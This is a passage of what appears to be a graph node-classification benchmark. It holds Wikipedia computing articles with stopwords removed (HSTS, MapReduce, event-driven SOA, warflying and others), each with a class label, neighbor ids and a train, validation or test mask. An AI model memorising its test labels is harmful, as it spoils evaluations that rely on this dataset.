      4743,
      9863,
      7820,
      9356,
      528,
      9371,
      5404,
      8865,
      4773,
      939,
      3117,
      3886,
      3887,
      2224,
      3762,
      6834,
      2490,
      6716,
      8508,
      9665,
      3911,
      7367,
      3323,
      2262,
      3159,
      10070,
      8921,
      8668,
      7645,
      6495,
      11487,
      9569,
      10083,
      5861,
      5355,
      9964,
      11125,
      1400,
      5881,
      5371,
      11646
    ],
    "mask": "None"
  },
  {
    "node_id": 11334,
    "label": 4,
    "text": "Anti-Subversion_Software:anti-subversion software software subversion process making software perform unintended actions either tampering program code altering behavior another fashion example code tampering could used change program code load malicious rules heuristics sql injection form subversion purpose data corruption theft buffer overflows form subversion purpose unauthorised access attacks examples computer hacking anti-subversion software detects subversion attempts stop effects hack software applications vulnerable effects subversion throughout lifecycle development deployment particularly operation maintenance anti-subversion protection accomplished static dynamic manner software applications running desktops corporate servers mobile devices embedded devices risk subversion",
    "neighbors": [
      1474,
      899
    ],
    "mask": "None"
  },
  {
    "node_id": 11335,
    "label": 4,
    "text": "William_O._Studeman:william o. studeman william oliver bill studeman born january 16 1940 retired admiral united states navy former deputy director central intelligence agency two extended periods acting director central intelligence deputy director central intelligence served administrations george h. w. bush bill clinton three directors central intelligence robert gates r. james woolsey jr. john m. deutch studeman retired navy 1995 almost 35 years service 1988 1992 director national security agency director naval intelligence september 1985 july 1988 6 february 2004 studeman appointed iraq intelligence commission independent panel tasked investigating u.s. intelligence surrounding united states 2003 invasion iraq iraq weapons mass destruction wmd studeman retired 2005 northrop grumman corporation vice president deputy general manager mission systems position focused strategies programs business development marketing related intelligence information warfare well corporate cross-sector integration managing technology partnerships concepts related netcentricity isr io/iw advanced command environments served position approximately 9 years studeman served corporate boards government university corporate advisory boards recently commissioner presidential commission wmd currently serving national advisory board bio-security public interest declassification board also member defense science board well national geospatial-intelligence agency advisory board defense intelligence agency joint military intelligence college national reconnaissance office national labs advisory boards chairman board naval intelligence foundations member board national cryptologic museum foundation 1962 received bachelor degree history university south sewanee tennessee studeman holds master degree public international affairs george washington university elliott school international affairs navy also distinguished graduate naval war college national war college well recipient honorary doctorate strategic intelligence defense intelligence college receive second honorary doctorate degree fall university south studeman recipient numerous service commendations citations including navy distinguished service medal legion merit two gold stars 2007 studeman awarded william oliver baker award intelligence national security alliance also received service medals governments france brazil south korea",
    "neighbors": [
      6017,
      8726,
      1189,
      9517,
      1838,
      5308,
      1986,
      327,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 11336,
    "label": 4,
    "text": "HYPR_Corp:hypr corp hypr corp venture-backed new york based company founded 2014 provides enterprises decentralized authentication technology accessing mobile web internet things iot applications hypr corp founded 2014 new york city team security researchers 800,000 private seed capital concluding 3 million growth funding round october 2016 ventures 10 million series funding round september 2017. company ’ decentralized authentication product unveiled international consumer electronics show ces january 2015 las vegas listed one top 10 best technologies ces 2015 zdnet company board member fast identity online fido alliance consortium global enterprises working towards open standards strong authentication 2017 gartner named firm cool vendor transforming multichannel unified retail commerce 2018 ceo co-founder george avetisov named forbes 30 30 list enterprise technology category hypr provides decentralized biometric tokenization scheme claims gives enterprises option replace use centralized password-based systems firm says forcing malicious attackers divert attention centralized validation server many client-side devices biometric tokenization decreases viability attack client-server authentication channel rendering common large-scale server-side data breach unscalable attack vector",
    "neighbors": [
      1945,
      5918
    ],
    "mask": "Test"
  },
  {
    "node_id": 11337,
    "label": 2,
    "text": "Palm_Pre_2:palm pre 2 palm pre 2 styled palm prē 2 slider smartphone designed marketed palm inc. hewlett-packard multi-touch screen physical sliding keyboard smartphone third use palm linux-based mobile operating system webos releasing version 2.0 pre 2 functions camera phone portable media player location navigation capabilities pre also serves personal information manager number communication collaboration applications bluetooth wi-fi connectivity built-in palm pre 2 announced october 19 2010 initial launch date october 22 2010 french carrier sfr also announced pre 2 would coming united states carrier verizon wireless rogers wireless canada also unlocked umts developer phone additions include flat gorilla glass screen instead curved plastic predecessors surrounded plastic trim faster processor upgraded camera plastic door covered microusb port previous iterations considered flimsy removed otherwise pre 2 size design predecessors pre 2 last mobile phone branded palm name pre 3 veer touchpad branded hp devices august 11 2010 webos developer geoff gauchet discovered unknown device code name roadrunner accessing foursquare app using new version webos version 2.0 october 12 2010 several specifications pre 2 including processor speed memory leaked france sfr website prior official launch october 22 november 18 2010 pre 2 became available u.s. unlocked developer device december 20 2010 pre 2 launched canada rogers wireless february 17 2011 pre 2 launched u.s. verizon wireless pre 2 first phone use version 2.0 hp palm webos last version available pre 2 version 2.2.4 subject carrier approval certain models however",
    "neighbors": [
      1537,
      3585,
      2308,
      10500,
      6790,
      5384,
      3340,
      1682,
      2962,
      405,
      3606,
      8982,
      10393,
      5019,
      6178,
      5164,
      9266,
      9013,
      694,
      823,
      1849,
      1083,
      1728,
      7492,
      10820,
      5318,
      9163,
      9037,
      2258,
      2259,
      1621,
      6618,
      5339,
      2784,
      1377,
      4449,
      4832,
      3300,
      2285,
      9581,
      10606,
      1776,
      2420,
      8952,
      10109,
      9598
    ],
    "mask": "Test"
  },
  {
    "node_id": 11338,
    "label": 1,
    "text": "Storm_(software):storm software storm python programming library object-relational mapping one sql databases python objects allows python developers formulate complex queries spanning multiple database tables support dynamic storage retrieval object information mysql postgresql sqlite database support built storm api allows support others storm also supports django zope web frameworks natively twisted support planned .20 release storm developed canonical ltd. python use launchpad landscape applications subsequently released 2007 free software project free software released gnu lesser general public license contributors required assign copyrights canonical version control done bazaar issue tracking launchpad",
    "neighbors": [
      9729,
      3080,
      5546,
      8554,
      5612,
      10250,
      7022,
      7983,
      9467,
      10413,
      8539,
      595,
      2804,
      3763,
      5755
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11339,
    "label": 8,
    "text": "Event-driven_SOA:event-driven soa event-driven soa form service-oriented architecture soa combining intelligence proactiveness event-driven architecture organizational capabilities found service offerings event-driven soa typical soa platform orchestrated services centrally pre-defined business processes assuming already triggered defined business process older approach sometimes called soa 1.0 account events occur across outside specific business processes thus complex events pattern activities—both non-scheduled scheduled—should trigger set services accounted traditional soa 1.0 architecture soa 2.0 architecture event-driven soa lets business users monitor analyze enrich events make connections among disparate events first appear intuitively obvious makes enriched events visible others especially business analysts marketing directors also allows soa 2.0 system possibly automate actions take address unique pattern soa 2.0 ability create high-level business events numerous low-level system events events created filtering real-time data middleware applications databases web services example infusing defining detail dependencies causal relationships discovered correlating events clear enriched events produced soa 2.0 environment customer shopping cart abandonment rate escalated last days notification marketing department could initiate research competitors done cause customers buy products elsewhere common product shopping carts prices offered competition practice relationship streamed events processed causal vector engine performs lookup based recently viewed events assigns causal vector event relationship discovered causes b causal vector engine checks b ’ causal vector rule index contains reference engine may handle events different transactions simultaneously perhaps different order occurred unlike sequential procedural systems clients must poll change requests event-driven soa allows systems components respond dynamically real time events occur soa 2.0 complements extends soa 1.0 introducing long-running processing capabilities long running processing capability enables architecture collect various asynchronous events long period time correlate events causal relationships soa 2.0 event patterns designed implemented look event relationships span days weeks months certain criteria met trigger business process address event pattern soa 2.0 event-driven programming structured around concept decoupled relationships event producers event consumers event consumer n't care event occurs rather concerned invoked event occurred systems applications separate event producers event consumers typically rely event dispatcher channel channel contains event queue acts intermediary event producers event handlers prototypical soa 2.0 paradigm contains four essential elements soa 2.0 web services composed two ways orchestration choreography orchestration central process takes control involved web services coordinates execution different operations web services involved operation involved soa 2.0 services know need know part composition higher business process central coordinator orchestration knows orchestration centralized explicit definitions operations order invocation soa 2.0 services choreography hand rely central coordinator rather soa 2.0 service involved choreography knows exactly execute operations based defined trigger criteria interact choreography collaborative effort focused exchange messages participants choreography need aware business process operations execute messages exchange timing message exchanges bpel follows orchestration paradigm choreography covered standards wsci web services choreography interface ws-cdl web services choreography description language causal relationships inherent world around us intrinsic decision making human intelligence processes gathers relationships faster current artificial computational capability one fundamental obstacles artificial intelligence absence automated ability relate events together human uses human intuition using causal vector engine perception causality enhanced appropriate spatiotemporal conditions based structural temporal rules written engine perception complex causal semantics additive mediated bidirectional causalities need coded engine distinguish events related appear related fact engine uses preponderant causal vector rate-of-change propagation code relationship among events establishes partial order validates causality perceived multiple occurrences engine plays replays event sequence different temporal order infer could related topological connections compares replays rules preprogrammed analyst multiple low-level system events processed causal vector engine compared rules trigger higher-level business events causality vector engine cve console application displays events real-time business analysts streams events observed occur much like stock ticker cve console app several windows list events different contexts business analysts see cve relationships sequential window shows events date-timestamp order one windows various orders cve works list rules creates implied relationships events various buttons controls exist console application enable business analysts create relationships events on-the-fly define rules respond relationships business analysts infuse additional defining detail sql query statement attached rule event context cve app works much like modern-day stock trading application mutual funds managers use manage risk example cve application engine seen silk enterprise service bus esb implementations contain facility called mediation example mediation flows part websphere enterprise service bus intercept mule also supports mediation flows mediation flows modify messages passed existing services clients use services mediation flow mediates intervenes provide functions message logging data transformation routing typically functions implemented using interception design pattern messages pass esb esb enriches messages destined channel monitoring high-level business event message esb may query database obtain additional information data entity within message example based customer id esb mediation flow could get zip code customer resides based ip address originating request end-user esb mediation flow could lookup country state county ip address examples represent data enrichment concept adding additional value existing data based intent high-level business event eventually triggered esb mediation flow one component types service component architecture sca like sca component program accesses mediation flow exports provides mediation flow forwards messages external services via imports special kinds imports exports jms called jms bindings enable developers specify binding configuration write data handling code mediation flow consists series mediation primitives manipulate messages flow bus developers coded custom binding export import start focus mediation flow component websphere integration developer assembly editor done jms custom binding mediation component operation flow component interface represented request response service data objects sdo framework provides unified framework data application development sdo developers need familiar specific api order access utilize data sdo developers simply work data multiple data sources relational databases entity ejb components xml pages web services service component architecture javaserver pages pages mediation flows entirely independent bindings used imports exports fact purpose conversion sdo dataobject instance outside flow implementation mediation flows built without knowledge protocol format messages sent mediation module business-level trigger condition enables soa 2.0 architecture establish real-time customer intelligence marketing automation customer loyalty solutions among features business objects model real-world entities architecture customers accounts loans travel itineraries state one objects changes monitoring agent notices change significant compared list criteria monitor event created passed monitoring agents example detection actual business problem opportunity could lead increased revenue customer cancels order extra manufacturing capacity could reduce profitability production run soa 2.0 event could notify marketing department create special sales campaign would resell excess capacity thereby recapturing original profitable cost-per-unit automatic monitoring events operational business process activities processes execute see immediate action needs taken either inside outside enterprise monitoring agents continually test specific business conditions changes business operations necessary agents alert people make recommendations send messages applications invoke whole business processes conditions changes occur triggered business process directly support revenue growth cost containment responsiveness business conditions ability pursue new market opportunities resulting business processes could also measure operational progress toward achieving goals control operational costs communicating needed needs know report performance status key processes key decision makers example could construct crm event abandoned shopping cart message parsing transaction customer id time using filters extract value goods cart tapping correlation capabilities system add causal indicators whether commerce site suffering performance problems crm event might also include customer value rank customer database another example based types independent service calls received soa 2.0 platform could identify product defect detecting underlying pattern separate complaints triggering alert engineering production possible defect example 3 potential use event-driven soa could virtual electricity market home clothes dryers bid price electricity use real-time market pricing system real-time market price control system could turn home electricity customers active participants managing power grid monthly utility bills customers set limits much would pay electricity run clothes dryer example electricity providers willing transmit power price would alerted grid could sell electricity dryer one side consumer devices bid power based much owner device willing pay set ahead time consumer side suppliers enter bids automatically electricity generators based much would cost start run generators electricity suppliers could perform real-time market analysis determine return-on-investment optimizing profitability reducing end-user cost goods event-driven soa software could allow homeowners customize many different types electricity devices found within home desired level comfort economy event-driven software could also automatically respond changing electricity prices little five-minute intervals example reduce home owner electricity usage peak periods electricity expensive software could automatically lower target temperature thermostat central heating system winter raise target temperature thermostat central cooling system summer event-driven soa software could shut heating element water heaters pre-set response limits established individual homeowners example market price electricity given hour exceeded home owner limit home owner could plan go without recharging water hot temperature hour prices high opt delay hot water temperature recharge next hour electricity market prices might lower criteria would managed home owner personal computer internet connection programming various devices around home consume electricity management software approves consumption savings represented technique enabled event-driven soa like improving gas mileage vehicle makes home energy use efficient enabling consumption electricity real-time prices lower inhibiting consumption electricity real-time prices higher one mechanism used soa 1.0 enterprise service bus implementations publish/subscribe facility implementing esb functionality pub/sub messages advanced knowledge system events needed create soa 2.0 message patterns enterprise implemented many publish functions soa middleware analysts set task strategizing available publish messages could assembled unique pattern detect soa 2.0-enriched trigger causal vector engine cve mechanics implemented simply expandable view sql constructs written stored procedures causes b causality must occur within n number transactions sql order timestamp clause creates result set increments counter transactions occurred within timeframe n number matching b occurrence transactions creation additional stored procedures accomplished cve console application using standard database developer toolkit domain algorithms fever/flu/infection domain logic cited reference used derive sql code applies selected business rules use case using cves soa environments improve business agility application soa 2.0 principles identify business opportunities would otherwise missed identified much later functional magnetic resonance imaging fmri using granger causality analysis gca detects causal effects among brain regions results one sample test demonstrated positive causal effect rfic dorsal anterior cingulate cortex dacc oracle cve analytical engine uses set theoretical models evaluates data business analyst configures causal factors he/she specifies criteria indicating models consider causal factor",
    "neighbors": [
      9345,
      4483,
      9225,
      4107,
      5403,
      8096,
      10413,
      8751,
      11457,
      2501,
      3529,
      10061,
      6483,
      5460,
      8149,
      7775,
      10849,
      3558,
      2283,
      10617,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 11340,
    "label": 8,
    "text": "Acadine_Technologies:acadine technologies acadine technologies holdings limited systems software company specializing mobile operating systems mobile wearable internet things iot devices core product h5os web-centric operating system primarily based open web standard html5 derived firefox os whose development company founder li gong overseen president mozilla corporation acadine technologies founded march 25 2015 based hong kong operations beijing taipei palo alto london initially started name gone fishing startup recruited various staff mozilla apart gong including james ho former mozilla cto andreas gal employees mozilla taiwan mozilla announced december 2015 would cease efforts partner mobile carriers use firefox os smartphones reported acadine would take mission h5os released first version h5os 17th feb 2016 announced july 15 2015 acadine technologies received 100m first-round funding tsinghua unigroup international hong kong entity controlled tsinghua university chinese government year li gong stated company already seeking second round funding international investors main rationale dispel early incorrect perception somehow china-backed company really pure silicon valley-style startup april 27 2016 reported funds tsinghua unigroup transferred acadine started reorganization h5os discontinued may 2016 never publicly released",
    "neighbors": [
      2428
    ],
    "mask": "Test"
  },
  {
    "node_id": 11341,
    "label": 4,
    "text": "Warflying:warflying warflying warstorming activity consisting using airplane wi-fi-equipped computer laptop pda detect wi-fi wireless networks warstorming shares similarities wardriving warwalking aspects except method transport originated western australia wafreenet wafn group taking grumman tiger four-seater near perth city 2002 documented weblog jason jordan due nature flying much difficult attempt access open networks warflying",
    "neighbors": [
      6712,
      7222
    ],
    "mask": "None"
  },
  {
    "node_id": 11342,
    "label": 2,
    "text": "Omega_Drivers:omega drivers omega drivers unofficial third-party device drivers ati nvidia graphics cards created angel trinidad differed official drivers offer customization extra features compatible ati graphics cards nvidia cards use detonator drivers drivers tweaked versions officially released ati nvidia mainly using registry tweaks offering alternative installer custom drivers compiled source code website omega ati driver based ati catalyst drivers driver particularly notable resolving 3d compatibility problems affecting past versions ati drivers versions 7.8-7.12 agp cards driver includes various third party utilities including 'multires entech taiwan ati tray tools tweaking utility drivers recognized ati best alternative drivers internet according terry makedon nvidia previously attempted legal action versions omega drivers company since allowed omega drivers nvidia cards made recently amd began offering upgraded driver known catalyst omega driver amd claims change brand due significant feature additions mentioned existence omega drivers omega drivers noted affiliated amd-distributed catalyst omega driver",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 11343,
    "label": 7,
    "text": "MapReduce:mapreduce mapreduce programming model associated implementation processing generating big data sets parallel distributed algorithm cluster mapreduce program composed map procedure method performs filtering sorting sorting students first name queues one queue name reduce method performs summary operation counting number students queue yielding name frequencies mapreduce system also called infrastructure framework orchestrates processing marshalling distributed servers running various tasks parallel managing communications data transfers various parts system providing redundancy fault tolerance model specialization split-apply-combine strategy data analysis inspired map reduce functions commonly used functional programming although purpose mapreduce framework original forms key contributions mapreduce framework actual map reduce functions example resemble 1995 message passing interface standard reduce scatter operations scalability fault-tolerance achieved variety applications optimizing execution engine single-threaded implementation mapreduce usually faster traditional non-mapreduce implementation gains usually seen multi-threaded implementations multi-processor hardware use model beneficial optimized distributed shuffle operation reduces network communication cost fault tolerance features mapreduce framework come play optimizing communication cost essential good mapreduce algorithm mapreduce libraries written many programming languages different levels optimization popular open-source implementation support distributed shuffles part apache hadoop name mapreduce originally referred proprietary google technology since genericized 2014 google longer using mapreduce primary big data processing model development apache mahout moved capable less disk-oriented mechanisms incorporated full map reduce capabilities mapreduce framework processing parallelizable problems across large datasets using large number computers nodes collectively referred cluster nodes local network use similar hardware grid nodes shared across geographically administratively distributed systems use heterogeneous hardware processing occur data stored either filesystem unstructured database structured mapreduce take advantage locality data processing near place stored order minimize communication overhead mapreduce framework system usually composed three operations steps mapreduce allows distributed processing map reduction operations maps performed parallel provided mapping operation independent others practice limited number independent data sources and/or number cpus near source similarly set 'reducers perform reduction phase provided outputs map operation share key presented reducer time reduction function associative process often appears inefficient compared algorithms sequential multiple instances reduction process must run mapreduce applied significantly larger datasets single commodity server handle – large server farm use mapreduce sort petabyte data hours parallelism also offers possibility recovering partial failure servers storage operation one mapper reducer fails work rescheduled – assuming input data still available another way look mapreduce 5-step parallel distributed computation five steps logically thought running sequence – step starts previous step completed – although practice interleaved long final result affected many situations input data might already distributed sharded among many different servers case step 1 could sometimes greatly simplified assigning map servers would process locally present input data similarly step 3 could sometimes sped assigning reduce processors close possible map-generated data need process map reduce functions mapreduce defined respect data structured key value pairs map takes one pair data type one data domain returns list pairs different domain codice_3 → codice_4 map function applied parallel every pair keyed codice_5 input dataset produces list pairs keyed codice_6 call mapreduce framework collects pairs key codice_6 lists groups together creating one group key reduce function applied parallel group turn produces collection values domain codice_8 → codice_9 reduce call typically produces either one value v3 empty return though one call allowed return one value returns calls collected desired result list thus mapreduce framework transforms list key value pairs list values behavior different typical functional programming map reduce combination accepts list arbitrary values returns one single value combines values returned map necessary sufficient implementations map reduce abstractions order implement mapreduce distributed implementations mapreduce require means connecting processes performing map reduce phases may distributed file system options possible direct streaming mappers reducers mapping processors serve results reducers query canonical mapreduce example counts appearance word set documents document split words word counted map function using word result key framework puts together pairs key feeds call reduce thus function needs sum input values find total appearances word another example imagine database 1.1 billion people one would like compute average number social contacts person according age sql query could expressed using mapreduce k1 key values could integers 1 1100 representing batch 1 million records k2 key value could person age years computation could achieved using following functions mapreduce system would line 1100 map processors would provide corresponding 1 million input records map step would produce 1.1 billion n,1 records values ranging say 8 103 mapreduce system would line 96 reduce processors performing shuffling operation key/value pairs due fact need average per age provide millions corresponding input records reduce step would result much reduced set 96 output records would put final result file sorted count info record important processing reduced one time add count records computed average would wrong example reduce files 1 2 new file average 9 contacts 10-year-old person 9+9+9+9+9 /5 reduce file 3 lose count many records 've already seen end average 9.5 contacts 10-year-old person 9+10 /2 wrong correct answer 9.166 55 6 9*3+9*2+10*1 3+2+1 software framework architecture adheres open-closed principle code effectively divided unmodifiable frozen spots extensible hot spots frozen spot mapreduce framework large distributed sort hot spots application defines input reader divides input appropriate size 'splits practice typically 64 mb 128 mb framework assigns one split map function input reader reads data stable storage typically distributed file system generates key/value pairs common example read directory full text files return line record map function takes series key/value pairs processes generates zero output key/value pairs input output types map often different application word count map function would break line words output key/value pair word output pair would contain word key number instances word line value map function output allocated particular reducer application partition function sharding purposes partition function given key number reducers returns index desired reducer typical default hash key use hash value modulo number reducers important pick partition function gives approximately uniform distribution data per shard load-balancing purposes otherwise mapreduce operation held waiting slow reducers finish i.e reducers assigned larger shares non-uniformly partitioned data map reduce stages data shuffled parallel-sorted exchanged nodes order move data map node produced shard reduced shuffle sometimes take longer computation time depending network bandwidth cpu speeds data produced time taken map reduce computations input reduce pulled machine map ran sorted using application comparison function framework calls application reduce function unique key sorted order reduce iterate values associated key produce zero outputs word count example reduce function takes input values sums generates single output word final sum output writer writes output reduce stable storage mapreduce programs guaranteed fast main benefit programming model exploit optimized shuffle operation platform write map reduce parts program practice author mapreduce program however take shuffle step consideration particular partition function amount data written map function large impact performance scalability additional modules combiner function help reduce amount data written disk transmitted network mapreduce applications achieve sub-linear speedups specific circumstances designing mapreduce algorithm author needs choose good tradeoff computation communication costs communication cost often dominates computation cost many mapreduce implementations designed write communication distributed storage crash recovery tuning performance mapreduce complexity mapping shuffle sorting grouping key reducing taken account amount data produced mappers key parameter shifts bulk computation cost mapping reducing reducing includes sorting grouping keys nonlinear complexity hence small partition sizes reduce sorting time trade-off large number reducers may impractical influence split unit size marginal unless chosen particularly badly say 1mb gains mappers reading load local disks average minor processes complete quickly data fits main memory single machine small cluster using mapreduce framework usually effective since frameworks designed recover loss whole nodes computation write interim results distributed storage crash recovery expensive pays computation involves many computers long runtime computation task completes seconds restarted case error likelihood least one machine failing grows quickly cluster size problems implementations keeping data memory simply restarting computation node failures —when data small enough— non-distributed solutions often faster mapreduce system mapreduce achieves reliability parceling number operations set data node network node expected report back periodically completed work status updates node falls silent longer interval master node similar master server google file system records node dead sends node assigned work nodes individual operations use atomic operations naming file outputs check ensure parallel conflicting threads running files renamed possible also copy another name addition name task allowing side-effects reduce operations operate much way inferior properties regard parallel operations master node attempts schedule reduce operations node rack node holding data operated property desirable conserves bandwidth across backbone network datacenter implementations necessarily highly reliable example older versions hadoop namenode single point failure distributed filesystem later versions hadoop high availability active/passive failover namenode mapreduce useful wide range applications including distributed pattern-based searching distributed sorting web link-graph reversal singular value decomposition web access log stats inverted index construction document clustering machine learning statistical machine translation moreover mapreduce model adapted several computing environments like multi-core many-core systems desktop grids multi-cluster volunteer computing environments dynamic cloud environments mobile environments high-performance computing environments google mapreduce used completely regenerate google index world wide web replaced old ad hoc programs updated index ran various analyses development google since moved technologies percolator flumejava millwheel offer streaming operation updates instead batch processing allow integrating live search results without rebuilding complete index mapreduce stable inputs outputs usually stored distributed file system transient data usually stored local disk fetched remotely reducers david dewitt michael stonebraker computer scientists specializing parallel databases shared-nothing architectures critical breadth problems mapreduce used called interface low-level questioned whether really represents paradigm shift proponents claimed challenged mapreduce proponents claims novelty citing teradata example prior art existed two decades also compared mapreduce programmers codasyl programmers noting writing low-level language performing low-level record manipulation mapreduce use input files lack schema support prevents performance improvements enabled common database system features b-trees hash partitioning though projects pig piglatin sawzall apache hive ysmart hbase bigtable addressing problems greg jorgensen wrote article rejecting views jorgensen asserts dewitt stonebraker entire analysis groundless mapreduce never designed intended used database dewitt stonebraker subsequently published detailed benchmark study 2009 comparing performance hadoop mapreduce rdbms approaches several specific problems concluded relational databases offer real advantages many kinds data use especially complex processing data used across enterprise mapreduce may easier users adopt simple one-time processing tasks mapreduce programming paradigm also described danny hillis 1985 thesis widely-used time program connection machine special hardware support accelerate map reduce google granted patent mapreduce however claims patent granted mapreduce similar existing products example map reduce functionality easily implemented oracle pl/sql database oriented language supported developers transparently distributed database architectures clusterpoint xml database mongodb nosql database mapreduce tasks must written acyclic dataflow programs i.e stateless mapper followed stateless reducer executed batch job scheduler paradigm makes repeated querying datasets difficult imposes limitations felt fields machine learning iterative algorithms revisit single working set multiple times norm",
    "neighbors": [
      4096,
      7175,
      9225,
      8719,
      3600,
      19,
      7700,
      8217,
      9244,
      10284,
      3633,
      1078,
      9782,
      9285,
      4683,
      590,
      3664,
      9300,
      8285,
      8799,
      2658,
      8810,
      619,
      2163,
      9331,
      8821,
      1142,
      119,
      5238,
      7816,
      10377,
      5262,
      6800,
      11408,
      10393,
      8858,
      7326,
      7841,
      10413,
      1203,
      2234,
      7359,
      6851,
      196,
      3269,
      1222,
      3782,
      10445,
      4817,
      11473,
      3795,
      5332,
      1240,
      8413,
      9949,
      6367,
      236,
      9970,
      7926,
      3836,
      3326,
      5892,
      8455,
      11535,
      4377,
      10009,
      5917,
      798,
      6943,
      288,
      6433,
      10525,
      3877,
      4901,
      5431,
      2875,
      10045,
      2880,
      11590,
      11592,
      10571,
      333,
      9039,
      337,
      3409,
      2901,
      3934,
      3432,
      5483,
      1913,
      7548,
      10111,
      1409,
      4995,
      9610,
      5522,
      1427,
      5524,
      10645,
      3990,
      1435,
      2978,
      1959,
      3499,
      7595,
      5047,
      5577,
      4044,
      4048,
      2011,
      6113,
      6632,
      5100,
      6124,
      9712,
      2557
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11344,
    "label": 8,
    "text": "Web-Based_Enterprise_Management:web-based enterprise management computing web-based enterprise management wbem comprises set systems-management technologies developed unify management distributed computing environments wbem initiative initially sponsored 1996 bmc software cisco systems compaq computer intel microsoft widely adopted wbem based internet standards distributed management task force dmtf open standards although name labels wbem web-based necessarily dependent particular user interface see systems-management approaches include remote shells proprietary solutions ietf standardized network-management architectures like snmp netconf wbem allows management element standard inter-operable manner wbem provides technology underlying different management initiatives information technology understand wbem architecture consider components lie operator trying manage device configure turn collect alarms etc actual hardware software device pieces device manufacturer service provider write",
    "neighbors": [
      514,
      4771,
      8554,
      6797,
      3278,
      6511,
      9455,
      1079,
      1304,
      6168,
      3323,
      2168,
      3133,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 11345,
    "label": 4,
    "text": "HTTP_Strict_Transport_Security:http strict transport security http strict transport security hsts web security policy mechanism helps protect websites protocol downgrade attacks cookie hijacking allows web servers declare web browsers complying user agents interact using secure https connections never via insecure http protocol hsts ietf standards track protocol specified rfc 6797 hsts policy communicated server user agent via https response header field named nowiki strict-transport-security /nowiki hsts policy specifies period time user agent access server secure fashion website using hsts must never accept clear text http either connect http systematically redirect users https consequence user-agent capable tls able connect site anymore hsts specification published rfc 6797 19 november 2012 approved 2 october 2012 iesg publication proposed standard rfc authors originally submitted internet-draft 17 june 2010 conversion internet-draft specification name altered strict transport security sts http strict transport security specification applies http http response header field defined hsts specification however remains named strict-transport-security last so-called community version then-named sts specification published 18 december 2009 revisions based community feedback original draft specification jeff hodges paypal collin jackson adam barth published 18 september 2009 hsts specification based original work jackson barth described paper forcehttps protecting high-security web sites network attacks additionally hsts realization one facet overall vision improving web security put forward jeff hodges andy steingruebl 2010 paper need coherent web security policy framework server implements hsts policy supplying header https connection hsts headers http ignored example server could send header future requests domain next year max-age specified seconds 31,536,000 equal one non-leap year use https codice_1 web application issues hsts policy user agents conformant user agents behave follows nowiki rfc 6797 /nowiki hsts policy helps protect web application users passive eavesdropping active network attacks man-in-the-middle attacker greatly reduced ability intercept requests responses user web application server user browser hsts policy effect web application important security vulnerability hsts fix ssl-stripping man-in-the-middle attacks first publicly introduced moxie marlinspike 2009 blackhat federal talk new tricks defeating ssl practice ssl tls stripping attack works transparently converting secure https connection plain http connection user see connection insecure crucially way knowing whether connection secure many websites use tls/ssl therefore way knowing without prior knowledge whether use plain http due attack simply website n't implemented tls/ssl additionally warnings presented user downgrade process making attack fairly subtle vigilant marlinspike sslstrip tool fully automates attack hsts addresses problem informing browser connections site always use tls/ssl hsts header stripped attacker user first visit google chrome mozilla firefox internet explorer microsoft edge attempt limit problem including pre-loaded list hsts sites unfortunately solution scale include websites internet see limitations hsts also help prevent one cookie-based website login credentials stolen widely available tools firesheep hsts time limited sensitive attacks involving shifting victim computer time e.g using false ntp packets initial request remains unprotected active attacks uses insecure protocol plain http uri initial request obtained insecure channel applies first request activity period specified advertised hsts policy nowiki max-age /nowiki sites set period several days months depending user activity behavior google chrome mozilla firefox internet explorer/microsoft edge address limitation implementing hsts preloaded list list contains known sites supporting hsts list distributed browser uses https initial request listed sites well previously mentioned pre-loaded lists scale cover entire web potential solution might achieved using dns records declare hsts policy accessing securely via dnssec optionally certificate fingerprints ensure validity requires running validating resolver avoid last mile issues junade ali noted hsts ineffective use phony domains using dns-based attacks possible man-in-the-middle interceptor serve traffic artificial domain hsts preload list made possible dns spoofing attacks simply domain name misleadingly resembles real domain name www.example.org instead www.example.com even hsts preloaded list hsts ca n't prevent advanced attacks tls beast crime attacks introduced juliano rizzo thai duong attacks tls orthogonal hsts policy enforcement see discussion overall hsts security considerations hsts used near-indelibly tag visiting browsers recoverable identifying data supercookies persist browser incognito privacy modes creating web page makes multiple http requests selected domains example twenty browser requests twenty different domains used theoretically one million visitors distinguished 2 due resulting requests arriving via http vs. https latter previously recorded binary bits established earlier via hsts headers depending actual deployment certain threats e.g cookie injection attacks avoided following best practices",
    "neighbors": [
      513,
      517,
      1157,
      1288,
      8584,
      9744,
      1683,
      1688,
      7708,
      7965,
      3742,
      2083,
      11044,
      8358,
      11693,
      11569,
      9394,
      9909,
      7736,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      2003,
      5078,
      87,
      5590,
      2777,
      474,
      9690,
      3805,
      4063,
      7264,
      225,
      8674,
      7139,
      3941,
      4326,
      10341,
      10344,
      5107,
      501,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 11346,
    "label": 3,
    "text": "Balance_of_Power_(video_game):balance power video game balance power computer strategy game geopolitics cold war created chris crawford published 1985 macintosh mindscape followed ports variety platforms next two years game player takes role president united states general secretary soviet union goal improve player country standing world relative superpower yearly turn random events occur may effects player international prestige player choose respond events various ways may prompt response superpower creates brinkmanship situations two nations potentially escalating nuclear war ends game crawford already well-known especially eastern front 1941 1984 announcement moving macintosh platform work new concept generated considerable interest widely reviewed release including extremely positive review new york times magazine praised inventive non-action gameplay nevertheless exciting distinct named computer gaming world one innovative computer games time balance power successful mac combined ports ultimately sold quarter million units player may choose either president united states general secretary communist party soviet union must lead chosen superpower eight years seeking maximize prestige avoiding nuclear war turn one year long beginning year player presented set incidents crises various countries around globe must choose response one responses may range action diplomatic notes superpower military maneuvers response met counter-response may vary backing escalation player gets chance initiate actions deal opponent responses core mechanic similar bruce ketchledge 1983 game geopolitique 1990 published ssi one difference earlier game negotiations resolved games backing negotiation results loss prestige reverberate politically likewise games brinkmanship may result global war geopolitique wars actually fought in-game game continued balance power war ends game instantly following message ignited n accidental nuclear war animated display mushroom cloud parts bodies flying air reward failure crawford made name years atari late 1970s early 1980s smash hit eastern front 1941 made one game authors known name helped ensure later releases also successful degree early 1984 atari rapidly going bankrupt due effects north american video game crash 1983 